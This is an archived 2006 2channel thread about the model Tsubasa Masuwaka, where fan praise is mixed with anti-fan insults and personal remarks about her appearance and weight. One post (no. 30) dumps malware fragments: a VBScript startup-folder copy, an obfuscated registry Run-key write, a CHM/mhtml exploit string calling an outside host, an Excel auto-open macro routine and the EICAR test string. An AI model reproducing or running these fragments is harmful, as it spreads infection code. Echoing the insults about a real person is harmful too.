2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆益若つばさ☆No.5☆

1 :無名モデル:2006/10/07(土) 19:02:19 ID:7UUzrqQR

ポップなどで読モの益若つばさちゃんかわいい!!!
(前スレ)
http://life7.2ch.net/test/read.cgi/model/1156297332/
-------------------------------
  ☆約束☆

▼益若つばさちゃんファン専用
▼僻みは他でやってて下さい
▼このスレは応援スレです
--------------------------------


2 :無名モデル:2006/10/07(土) 19:31:50 ID:eRWqngjK
2ゲト?

3 :無名モデル:2006/10/07(土) 19:58:38 ID:Z5Kp2YrF
久しぶりにファンスレだ!
でもアンチスレできそうだけど。。

4 :無名モデル:2006/10/07(土) 20:08:26 ID:flE24Ln7
アンチなんてただの僻みだしほっとこうよ!

可愛いのは事実なんだし(゚∀゚)

5 :無名モデル:2006/10/07(土) 20:10:40 ID:???
>>1
毎日いる身内乙です!

6 :無名モデル:2006/10/07(土) 20:20:40 ID:kJXzjW7X
ファンスレがNO5じゃなくて、アンチスレがNO5じゃない?

7 :無名モデル:2006/10/07(土) 20:59:12 ID:lriG2WJF
>>6確かに。よしっ荒らしまくるか!www

8 :無名モデル:2006/10/07(土) 21:00:38 ID:h1WJ0bQs
>>6
それ思った!アンチスレタイ結局どれに決まったんだろ?早くw

9 :無名モデル:2006/10/07(土) 21:06:45 ID:wN31/s6T
スレタイがフツーだからヘンだと思った。アンチスレがNO5だからね。スレたてた人間違えたのかな?

10 :無名モデル:2006/10/07(土) 22:02:38 ID:kJXzjW7X
・あばずれ
・整形
・ブス
・うんこ(色)
・アンパンマン
・チビデブ
・ファン獲得必死
・ニャ汚き
・ニート24歳

スレ題、↑らへんが候補だったよねw

11 :無名モデル:2006/10/07(土) 22:32:41 ID:flE24Ln7
右のチラシはやばいでしょ・・・。
http://image.blog.livedoor.jp/blog_ch/imgs/a/3/a346cb6c.gif

10秒程画面に顔近づけてみてみ

12 :無名モデル:2006/10/08(日) 02:20:00 ID:8h+buCzl
おい!バカ主!さっさとこのスレ削除しろ!

13 :無名モデル:2006/10/08(日) 03:07:01 ID:uE89pOUB
http://ip.tosp.co.jp/i.asp?i=yellowlip 翼悪用

14 :無名モデル:2006/10/08(日) 08:55:51 ID:???
てかスレタイの番号間違ってるんだし、ほんとに削除した方がいいんじゃない?
削除ってスレ立てた人じゃないと出来ないの?

15 :無名モデル:2006/10/08(日) 08:59:51 ID:b0vxPIbp
つばさかわゆす!

16 :無名モデル:2006/10/08(日) 09:10:02 ID:rmY1VYh3
排除依頼だせば?

17 :無名モデル:2006/10/08(日) 10:12:13 ID:gj19+OfI
てかファンスレ立てたとたん削除依頼の話題でるなんてこいつどんだけ嫌われてんだよ笑

18 :無名モデル:2006/10/08(日) 10:36:32 ID:TWn+M8Gs
ファンのくせにスレ番間違えるなんて糞
さすがうんこ益馬鹿ファンw整形アンパソマソなんて僻まないからw
とっとと削除しろ

19 :無名モデル:2006/10/08(日) 11:23:13 ID:PkOFD3OA
ぜってぇやだ

20 :無名モデル:2006/10/08(日) 11:46:26 ID:WvoeLqdU
>>11 心臓痛くなった……

21 :無名モデル:2006/10/08(日) 11:49:59 ID:???
【整形あばずれ女益若つばさ NO.5【ファン集め必死】
http://life7.2ch.net/test/read.cgi/model/1160231505/

ハイ皆さん早くアンチスレへ移動しましょう!

22 :無名モデル:2006/10/08(日) 23:17:21 ID:hIfg2C/f
こいつのファンってパなガキしかいねぇから

23 :無名モデル:2006/10/10(火) 15:23:03 ID:DDe5iTVu
あたしファンですが何か?

24 :無名モデル:2006/10/10(火) 15:58:04 ID:???
ブログに毎日書き込みしてる菜月って奴、長文うざい いつも長々くだらないこと書いて、荒らしや中傷より迷惑

25 :無名モデル:2006/10/10(火) 17:26:09 ID:oNBkZwq2
昨日ガールズコレクションで見たよ!
雑誌よりすごく可愛いじゃん

26 :無名モデル:2006/10/16(月) 06:56:08 ID:09lN6+Ig
苗字なんて読むの?

27 :無名モデル:2006/10/16(月) 07:46:57 ID:/qPRnxbF
昨日渋谷でダーリンと撮影していたね

28 :無名モデル:2006/10/16(月) 09:59:41 ID:???
益若(ますわか)と読む

29 :無名モデル:2006/10/18(水) 17:07:22 ID:5jW7kF6W
>>23何か?って言葉を使いたかっただけじゃないの?だからパなガキって書いてるじゃん

30 :<body onload=window()>:2006/10/19(木) 00:21:39 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


31 ::2006/10/30(月) 04:34:49 ID:???
ひがみゎやめたら?見てて痛いよ;つばさちゃんが可愛くて気に入らないだけでしょ?ガキって言ってるけどあんたの方がよっぽどガキだと思うよ…てかあたしもファンだけど何か?笑

32 :無名モデル:2006/10/31(火) 04:11:34 ID:71QUNM3h
アンチスレは凄い伸びようなのにファンスレは全然だねWどんだけかばってもこいつの嫌われようを物語ってるしWW

33 :無名モデル:2006/10/31(火) 04:20:00 ID:???
ファンスレ存在しなかったくせに、何で急にNo5とかなってんの?wwww

ちなみに、アンチスレはNo5だけどねwww
ファンスレとアンチスレの区別も付けられない益バカファン乙www

これだから、お前ら低能って言われるんだよwww

34 :無名モデル:2006/10/31(火) 05:16:49 ID:yLVhKXdU
だからwww ファンレスとアンチレスも区別出来ないとかよっぽどオツム弱いんだね。馬鹿主だわ。

35 :無名モデル:2006/10/31(火) 05:56:33 ID:???
↑通りすがりだけど、レスじゃなくてスレねw
アンチはアンチでファンスレには書き込みするなって


36 :無名モデル:2006/10/31(火) 07:50:10 ID:???
>>34 あ素で間違えた

37 :無名モデル:2006/10/31(火) 14:23:33 ID:Nw+6x9Ps
>>34宮城の人?^^

38 :無名モデル:2006/11/01(水) 00:48:57 ID:EeE7GGK2
可愛いけどなんだか好きになれないな
小さくて羨ましい

39 :無名モデル:2006/11/04(土) 11:12:20 ID:DkHcqws1
この人は可愛いね
これブスって言うのって殆どが僻みからきてるね

まぁ1000歩譲って整形してたとしても、可愛いのには変わりない

40 :無名モデル:2006/11/11(土) 01:21:04 ID:B1OAjE1D
つーさん鼻と口が安藤美姫に似てる

41 :無名モデル:2006/11/11(土) 13:14:28 ID:UZF9Nioe
>>40はぁ?全然似てないしW口裂けおんなで唇薄いよ安藤は。つばさって上唇厚いから笑った口元キモイ

42 :無名モデル:2006/11/12(日) 15:09:41 ID:???
>>41
僻み乙
おまえより可愛いのは確実だよ

43 :無名モデル:2006/11/16(木) 14:15:57 ID:6lnOcHZu
書き込んで!!☆

44 :無名モデル:2006/11/16(木) 22:05:38 ID:???
なんだかんだ言って可愛いよね

45 :無名モデル:2006/11/18(土) 10:45:32 ID:???
つばさ、よくみるよ
ママと一緒にいるとこ
可愛くもない普通の人だよ

46 :無名モデル:2006/11/18(土) 13:33:53 ID:5RYxaSXD
整形して可愛くなるならいいと思う。
でも性格悪くなるのはどうかと思う。

47 :無名モデル:2006/12/15(金) 13:47:02 ID:SOQa3lAl
敬語使えないくらいいいじゃない…若いんだし。
最初は敬語使ってたよー仲良くなってからタメ語になったけど、若いうちは敬語くらい許容範囲です。
何故なら可愛いから…いや、可愛いくて素直で好きだから。
因みに誰だって最初からギャルじゃないでしょうに……。
でもすっぴんでも可愛い…訳あってもう会えないんだけど本当に大好き。
つばさちゃん見ると自分がコケシかハニワっぽく見えて……
整形しようか考えちゃうし私が男だったら貢いでたかも……orz

48 :無名モデル:2006/12/18(月) 01:03:39 ID:BfKrZx8k
つーちゃんに似てるってオカンと友達からいわれた☆ふくざつ


49 :無名モデル:2006/12/18(月) 05:28:37 ID:W2uUGei4
若い?ポップティーンにしてはばばあだぞ。

50 :無名モデル:2006/12/18(月) 08:00:36 ID:mBgjWIEE
>>1
意図的にファンスレにしたな

51 :無名モデル:2006/12/18(月) 08:21:58 ID:???
糞スレあげんな

52 :無名モデル:2006/12/18(月) 12:35:23 ID:87UiMEre
21でみっともない

53 :無名モデル:2006/12/18(月) 13:11:48 ID:07KYUj7w
口が変。特に笑ったら

54 :無名モデル:2006/12/18(月) 13:24:18 ID:???
アンチスレたてないのは、通報がこわいから?

55 :無名モデル:2006/12/18(月) 14:33:32 ID:DyisHUdv
アンチスレにファンもよくレスしてたからお互い様

56 :nana:2006/12/18(月) 15:15:15 ID:wIFP0x/o
つばさちゃんかわいい!!
でも、超化粧濃い・・・。

57 :無名モデル:2006/12/19(火) 01:21:26 ID:tjnf4NP8
>>55よく言うよw

58 :無名モデル:2006/12/19(火) 12:41:32 ID:yR00Y9cV
ますわかつばさ

59 :無名モデル:2006/12/20(水) 22:58:07 ID:VNizz77W
アンチスレなんで消えたの?

60 :無名モデル:2006/12/21(木) 00:37:29 ID:3/cLiwGP
浜崎あゆみに似てる・・これとかhttp://54.xmbs.jp/pb2.php?ID=jewely&c_num=11906&serial=59989 翼ちゃん可愛い

61 :無名モデル:2006/12/21(木) 01:23:59 ID:DgIZN+A5
え?これ実物の浜崎でしょ?

62 :無名モデル:2006/12/21(木) 03:30:42 ID:i9cWynVz
今まで2回つばさちゃんに会ったことあるけど、かなりかわいかったよ!すごい肌も綺麗で細いしオーラあったよ!

63 :無名モデル:2006/12/21(木) 08:47:25 ID:VXfcwJ8B
>>61
上の画像がつばさちゃんに似てるってこと

64 :無名モデル:2006/12/21(木) 12:21:12 ID:i120UTi9
>>47若いって…もう二十歳なのに敬語つかえないのはやばいと思うけど


65 :無名モデル:2006/12/22(金) 21:46:48 ID:???
アンチスレまじでたてないね!やっぱ通報がこわいんだww

66 :無名モデル:2006/12/23(土) 00:04:15 ID:4/bDDoMp
どんどん可愛くなってる。なにげかなり前からでてるよね

67 :無名モデル:2006/12/23(土) 00:56:46 ID:TIHaGEWI
  硫 黄 島 か ら の 手 紙 の 全 米 興 行 収 入 が わ ず か

           
           2 0 0 万 円 で し た (笑) 


  マ ス ゴ ミ は 、ア カ デ ミー 賞 に 二 宮 & 渡 辺 ノ ミ ネ ー ト と か 言 っ て な か っ た (笑) ?

 
  い つ も 日  本 人 は ア ホ マ ス コ ミ に 騙 さ れ る 。 白 人 は 有 色 に 興 味 な し


  し か も 観 に い く 人 は ク リ ン ト 目 当 て だ か ら な 〜

68 :無名モデル:2006/12/23(土) 18:44:13 ID:???
この子細いよね!何キロくらいなんだろ

69 :無名モデル:2006/12/24(日) 02:06:19 ID:???
アンチが全く消えてファンスレも過疎ってやばくない?
この子もう消えるね

70 :無名モデル:2006/12/27(水) 12:17:03 ID:EEpY/Imx
>>68
150cm
37k

12 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)